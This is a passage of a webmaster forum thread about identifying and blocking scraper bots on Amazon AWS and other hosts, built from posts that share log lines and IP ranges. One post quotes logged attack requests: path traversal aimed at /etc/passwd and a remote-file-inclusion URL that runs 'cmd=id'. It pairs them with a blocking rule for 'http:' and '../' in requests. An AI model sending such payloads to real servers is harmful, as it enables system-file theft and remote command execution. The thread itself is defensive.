homepage Welcome to WebmasterWorld Guest from
register, free tools, login, search, pro membership, help, library, announcements, recent posts, open posts,
Become a Pro Member

Home / Forums Index / Search Engines / Search Engine Spider and User Agent Identification
Forum Library, Charter, Moderators: Ocean10000 & incrediBILL

Search Engine Spider and User Agent Identification Forum

This 88 message thread spans 3 pages: < < 88 ( 1 2 [3]     
Amazon AWS Hosts Bad Bots

 12:45 am on Sep 30, 2011 (gmt 0)

1.) Back in 2008, I noticed a lot of bad bots hailing from amazonaws.com and by January, 2009, I started a thread about what hid behind that early cloud:

amazonaws.com plays host to wide variety of bad bots [webmasterworld.com...]

Since that time, 270-plus reports/messages further document that the Amazon AWS Host name and Amazon AWS's countless IPs continue to be what forum mod IncrediBILL aptly termed:


This thread continues the saga of amazonaws.com and its spawn.

2.) The AWS cesspool is home to countless hundreds of bots, the vast majority of which ignore robots.txt. Home to hundreds more bots cloaked as regular UAs. Home to infected machines and bad programming, and all the ills to others that cloud anonymity affords.

And in recent weeks, home to bots with no UA at all... [webmasterworld.com...] Note the double-quotes at the end where a UA, or at least a hyphen, should be:

ec2-50-17-87-218.compute-1.amazonaws.com - - [00/Sep/2011:00:00:00] "GET /dir/filename.html HTTP/1.1" 403 1471 "-" ""

Today, the 'blank bot' -- what I've started thinking of as the AWSbot -- was the most frequent AWS 'visitor' to my main site. Four Hosts, four hits to different files, four 403s. robots.txt? NO



 8:28 pm on Apr 4, 2012 (gmt 0)

Block every IP range belonging to Amazon

Are you guys just blocking using IP Deny in shared hosting or quick deny in the Firewall on a VPS server?

About the ranges, is /24 the one that includes the entire range?

I see some people using /18, /15..etc?



 8:54 pm on Apr 4, 2012 (gmt 0)

Are you guys just blocking using IP Deny in shared hosting or quick deny in the Firewall on a VPS server?

Different people here use different methods, although I don't ever recall any "special" method being described for VPS.

About the ranges, is /24 the one that includes the entire range?

I see some people using /18, /15..etc?

the forward slash and the number that follows it are part of CIDR definitions for IP ranges.
the slash-number (/n) is dependent upon what precedes it.

There are numerous CIDR tools across the www.
There's a wiki page on CIDR which will assist you.


 7:46 pm on Apr 5, 2012 (gmt 0)

I generally block IPs using a custom-built trapping system, since I use IIS.

If an IP range gets really troublesome I add the range (or part of it) to the IIS Directory Security restrictions list. I have had to do this with a few amazon ranges.

If you have htaccess (linux/unix and some IIS servers) then use that.


 9:11 pm on Apr 5, 2012 (gmt 0)

What's IIS ;)
Might you provide a URL that shows examples of denying access in IIS?


 8:56 pm on Apr 6, 2012 (gmt 0)

I'm sure you know that IIS is the MS Windows web server. :)

A URL - short answer is no. Simple demo is try accessing one of our sites from a blocked IP/UA, complex answer is it's too complex to easily describe and there is a security risk in making the information available.


 10:07 pm on May 29, 2012 (gmt 0)

Just stopping by to add:

Pinterest/0.1 +http://pinterest.com/

robots.txt? NO

FWIW: Went for an .html file, no graphics.

(Aside: I grew so, SO weary of resource-wasting, robots.txt-ignoring AWS bots, I started adding AWS CIDRs to an iptables block. Now when new CIDRs appear, they simply await their date with killfile destiny. Muaha-ha;)


 3:33 pm on May 31, 2012 (gmt 0)

A biggie... - (
Amazon Technologies Inc.
Amazon AWS Network Operations
Registered late last year, some sub-ranges modified within the past month or so.

Two hits on my server today, widely separated within the 54.247/16 range - sub-listed as ...

54.247/16 - Amazon Web Services, Elastic Compute Cloud, EC2

... a limited spot-check on other /16 ranges does not give that.


 5:59 pm on May 31, 2012 (gmt 0)

fwiw, my notes say Amazon Technologies at 224-239 followed by AWS at 240-255, so you could probably go the whole /11.

Matter of fact, are there any humans in 54/8 at all? IANA says the whole thing belongs to Merck, whatever that means. That is, ahem, I know who Merck is, but I don't know if they're subletting to ISPs, or if people are cruising the web on company machines...


 9:23 pm on May 31, 2012 (gmt 0)

Thanks, Lucy. Didn't notice that one! :)

The idea of a "company" owning a complete /8 isn't new. Level3, psinet... Both of those are troublesome but seem to have a few humans around to confuse matters. Then there's IBM, AT&T...


 8:06 pm on Jun 10, 2012 (gmt 0)

I thought this might be a useful read, since it mentions amazon's cloud and how it can be used to crack passwords.

"The exponential growth in computing power described by Moore's Law and the advent of massive pools of elastic computing power in cloud based pools like Amazon's EC2 have broken down the walls that used to make passwords protected by hashing algorithms like SHA-1 and MD-5 all but unbreakable."


A good reason to block any of your password-protected sites from amazon-based bots. Sooner rather than later now the bot may turn out to be a cracker. And to uprate the password encoding, of course. :)


 8:23 pm on Jun 10, 2012 (gmt 0)

Here's why you should also block all requests with
http: or ../ in either the path or query string parameters.

All in the same second:
2012-nn-nn nn:nn:nn 78.46.74.nn 403 /search.php?page=../../../../../../../../../etc/passwd%00 <unknown referer> Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv: Geck
2012-nn-nn nn:nn:nn 78.46.74.nn 403 /search.php?page=../../../../../../../../../etc/passwd <unknown referer> Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv: Geck
2012-nn-nn nn:nn:nn 78.46.74.nn 403 /search.php?page=http://www.examplehotel.com.br/cmd3.txt?&cmd=id <unknown referer> Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv: Geck


 8:40 pm on Jun 10, 2012 (gmt 0)

hetzner/your-server.de -


 9:16 pm on Jun 10, 2012 (gmt 0)

Where "Hetzner" = "shoot first and ask questions afterward" ?

grandma genie

 8:09 pm on Jul 2, 2012 (gmt 0)

All these came in the other day, June 25, and all with the same UA, but different IPs, most are from Amazon. Now all blocked:

209.9.228.nnn - - "GET / HTTP/1.0" 301 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" Beyond The Network America, PullThePlug Technologies LLC
176.34.222.nn - - "GET /example HTTP/1.0" 301 249 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" Amazon Data Services Ireland Ltd
204.236.186.nnn - - "GET /example HTTP/1.0" 200 26468 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" us-west-1.compute.amazonaws.com
177.71.186.nn - - "GET /example HTTP/1.0" 403 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" sa-east-1.compute.amazonaws.com Brazil
67.217.160.nn - - "GET /example HTTP/1.0" 301 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" Hostname: place.holder ISP Latisys-Ashburn, LLC Ashburn, VA
67.217.165.nn - - "GET /example HTTP/1.0" 200 22675 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" same as above
67.217.168.nnn - - "GET /example HTTP/1.0" 200 838 "mywebsiteurl" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" same as above
175.41.156.nn - - "GET /example HTTP/1.0" 200 22917 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" ap-southeast-1.compute.amazonaws.com Singapore
50.112.42.nn - - "GET /example HTTP/1.0" 403 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" us-west-2.compute.amazonaws.com
50.57.168.nnn - - "GET /example HTTP/1.0" 200 28011 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" Hostname: static.cloud-ips.com Rackspace Hosting
184.73.73.nnn - - "GET /example HTTP/1.0" 403 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" compute-1.amazonaws.com Ashburn, VA
175.41.198.nnn - - "GET /example HTTP/1.0" 200 210463 "mywebsiteurl" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" ap-northeast-1.compute.amazonaws.com

I've listed behind the UA who they are and where they are from. What were they doing? Scraping...


 12:19 pm on Dec 9, 2012 (gmt 0)

I have all my htm and js files Gzip compressed on the server.
My provider does not implement the "expand compressed file if client does not support gzip delivery".

So I implemented in .htaccess a redirect for not gzip capable clients.

Now I discovered this discussion, because nearly only amazonaws spiders are on the redirected pages.

There are 2 possibilities, that a client wants the uncompressed contendt:

1.) Can not gzip and is therefore redirected
2.) It happens by a linke from somebody with problem 1

To eleminate point 2, my system now redirects all to the compressed content if HTTP_ACCEPT_ENCODING contains gzip.

Seems AmazonAWS is the only spider not able to understand gzip.


 2:33 pm on Dec 9, 2012 (gmt 0)

First visit from this bot = -

184.169.242.xxx - - [08/Dec/2012:22:51:33 -0800] "GET /robots.txt HTTP/1.1" 200 440 "-" "SkimBot/1.0 (skimlinks[dot]xxx <dev@skimlinks[dot]xxx>)"


 6:40 pm on Dec 9, 2012 (gmt 0)

Seems AmazonAWS is the only spider not able to understand gzip.

Is it possible that you've misunderstood this thread and/or Amazom AWS?

Amazon AWS is NOT a solitary spider representing Amazon, rather a bunch of rogue unidentified crawlers that Amazon sell server space to.
The server space software is dependent upon its own software capabilities.
Using the lack of Gzip capability is one method of stopping these economical crawlers.


 9:43 pm on Dec 9, 2012 (gmt 0)

gzip isn't the only compression method used by web browsers and other agents, although it is the most common.

Non-encoded content is sometimes requested by legitimate non-browsers or browser accessories such as anti-virus tools, which often cannot manage compressed files (it takes time to de-compreess them, which slows down the final browser view).

It is quite possible that desirable but small-time bots may not handle compression.

And as wilderness points out, it isn't a single amazon bot but dozens (or possibly hundreds!) of non-amazon bots using amazon cloud space.


 9:19 pm on Mar 27, 2013 (gmt 0)

I thought Amazon (and google) blockers may be interested in these extracts from today's Threatpost dot com article "U.S. and Russia--Not China--Lead List of Malicious Hosting Providers"

"...the appearance of Amazon in the top 10 list of providers hosting the highest concentration of infected Web sites. These are the kind of sites used in drive-by download attacks and to deliver exploits from exploit packs. Amazon, with more than two million IPs, ranks fourth in the list of providers hosting infected sites. Also on that list is Google, which comes in at number seven. The top spot belongs to Mail.ru, a Russian hosting provider."

The gist of the article is that "...if you're looking for the most malicious hosting providers on the Web, you won't find any of the top 10 in China. In fact, the United States and Russia have many more bad hosting providers in the top 20 than China does."

"...phishing sites ... four of the top 10 hosting providers being located in America."

Admittedly most of this is aimed at windows/mac/mobile desktop visitors, not web site hosts, but remember: they have to get new servers from somewhere and we are amongst the targets!


 10:03 pm on Mar 27, 2013 (gmt 0)

@ dstiles

Point taken and agreed with, however I think the differentiating terms here are "Malicious Hosting Providers."

According to my logs, an increasing amount of "malicious" activity comes from China IPs, just not traceable to "hosting providers." Most of these bad agents show as Chinanet or gov't owned properties. The lack of transparency is the real issue, so the entire country of China may be getting the blame.

In other parts of the world bad activity can be traced to individual companies & hosting providers.

I continue to block every China IP range I know of. Makes my job so much easier.


 9:03 pm on Mar 28, 2013 (gmt 0)

My view on this is:

Chinese hits are very often broadband-based, hence either a local (small-scale) server or (more likely) part of a botnet - individually the bandwidth is low but lots of machines make it higher. This is a scenario not constrained to China but operating in all countries to a greater or lesser degree.

Why China? As with several under-capitalized and anti-capitalist societies, there are a lot of pirated copies of windows in use. Pirated copies are not updateable through MS - they refuse access for updating (or at least used to - no current info). The result is a lot of very vulnerable operating systems which are easily compromised.

My hope is pinned, in China, on the Chinese version of Ubuntu they are supposed to be promoting. If the average person there runs Linux (which is free) there is a very much lower chance of those machines getting viruses - Linux is much more difficult to infect than either Windows, Mac or (eg) Android.

What I was posting about was the criminals themselves using AWS, G and lots of other clouds as Command & Control (C&C) servers but mostly about them being the hosting servers for web sites that serve up the viruses - botnets can't do that very well unless they include genuine high-bandwidth servers in their net to host the web sites (and where is the easiest place to get those now? Right...). The clouds are fair game: they are easy to install sites on to serve viruses and other compromising software.

Latest mention today is Evernote, which is being used to share C&C information around botnets and to then store the stolen data en route to the criminals' own system.

Given such use of clouds and the fact that before very long there will certainly be a report of a cloud data-breach, anyone for using a cloud to store their own data?

As an aside: Spamhaus has been hit by DDoS attacks three times greater than those directed at US banks. From China? Russia? Nope. From Cyberbunker in Netherlands - another prime source of badness. Cyberbunker have a bad reputation for spamming as well as providing hosting for the infamous Russian Business Network.


 3:45 am on Apr 2, 2013 (gmt 0)

New Amazon range (at least for me) -


 7:36 pm on Apr 2, 2013 (gmt 0)

I thought I'd made a big mistake when I checked I had that one. I had the IP range blocked from 54.224 to 54.255!

Turns out I was correct. Amazon holds the IP range: -


 1:02 am on Apr 3, 2013 (gmt 0)

Well that it would make sense, then it spans the 2 I have: - -


 6:48 pm on Apr 3, 2013 (gmt 0)

I've had the problem of split-range before but never on such a scale. :)

Nowadays I check ranges either side of newly-tagged ranges (server and dsl) to see if they occupy a larger range but this is certainly the largest "server farm" range I've seen.


 3:23 pm on Apr 16, 2013 (gmt 0)

And this is an extension to that range...

NetRange: -
OrgName: Amazon Technologies Inc.

NOTE: This is not necessarily cloud but I'm blocking it on principle.


 4:49 pm on Apr 16, 2013 (gmt 0)

Thanks dstiles, I agree


 11:07 pm on May 16, 2013 (gmt 0)

This thread was started 2 years ago and stuff changes.

I'm locking it as we need to start a new AWS thread.

This 88 message thread spans 3 pages: < < 88 ( 1 2 [3]
Global Options:
 top home search open messages active posts  

Home / Forums Index / Search Engines / Search Engine Spider and User Agent Identification
rss feed

All trademarks and copyrights held by respective owners. Member comments are owned by the poster.
Home ¦ Free Tools ¦ Terms of Service ¦ Privacy Policy ¦ Report Problem ¦ About ¦ Library ¦ Newsletter
WebmasterWorld is a Developer Shed Community owned by Jim Boykin.
© Webmaster World 1996-2014 all rights reserved